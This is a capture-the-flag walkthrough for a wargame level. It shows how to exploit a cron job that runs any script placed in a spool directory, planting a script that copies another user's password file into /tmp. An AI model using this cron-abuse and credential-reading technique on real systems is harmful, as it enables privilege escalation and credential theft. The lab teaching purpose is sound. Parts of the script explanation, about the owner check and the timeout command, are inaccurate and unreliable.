A program is running automatically at regular intervals from **cron**, the time-based job scheduler.\
Look in **/etc/cron.d/** for the configuration and see what command is being executed.

**NOTE**: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

**NOTE 2**: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around.

- - -

As you `cd /etc/cron.d/` and `cat cronjob_bandit24`.\
It outputs:
```
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
```

Now go ahead and type `cat /usr/bin/cronjob_bandit24.sh`.\
This will output:
```
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
```
Let's breakdown what this script is saying:
- The *for loop* basically iterates through the files within this `/var/spool/bandit24` directory.
- The first *if-statement* is ignoring the directory symbol `.` and the parent directory symbol `..`
- The second *if-statement* is checking if the user you're currenlty on is bandit23.
- The `timeout` command basically executes the `./$i` file every 60 seconds.
- The `rm -f` deletes the file. 

- - -

If you read the script, it says that it is `executing and deleting all scripts in /var/spool/$myname`. We assume that `myname` is **bandit24** because according to the  **cronjob_bandit24**, this script is being executed by bandit24.\
We can actually manually go inside this directory!\
Type:\
`cd /var/spool/bandit24`

Now that we understand the script, and since we are in the `/var/spool/bandit24` directory, we can put a file in here and have it execute every 60 seconds.  What we can do is put a script in `/var/spool/bandit24` to `cat` out the **bandit24 password** and put it into a directory we have access to.\
The directory we have access to will be the `/tmp` directory.  However, we'll have to make a folder in there first.\
So type:\
`mkdir /tmp/GETPASSWORD` 

Now that we have our directory we can create our script in `/var/spool/bandit24`.\
Type:\
`vim /var/spool/bandit24/password.sh`\
Put this inside the password.sh file:\
```
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/GETPASSWORD/bandit24password.txt
```
As soon as you save the file, quickly type:\
`chmod +x password.sh`
So that the file can be executable.
- - -

Now that we made our script, we now wait 60 seconds and then the `bandit24password.txt` should appear in the `/tmp/GETPASSWORD` directory.  
